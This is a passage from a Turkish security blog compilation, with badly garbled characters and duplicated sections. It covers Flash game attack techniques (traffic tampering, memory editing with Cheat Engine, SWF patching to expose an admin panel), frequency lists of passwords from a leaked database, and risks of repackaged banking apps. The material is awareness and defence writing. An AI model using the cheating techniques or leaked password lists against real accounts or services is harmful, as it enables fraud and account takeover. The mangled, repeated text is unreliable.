zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 36: Hack 4 Career - 2011

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

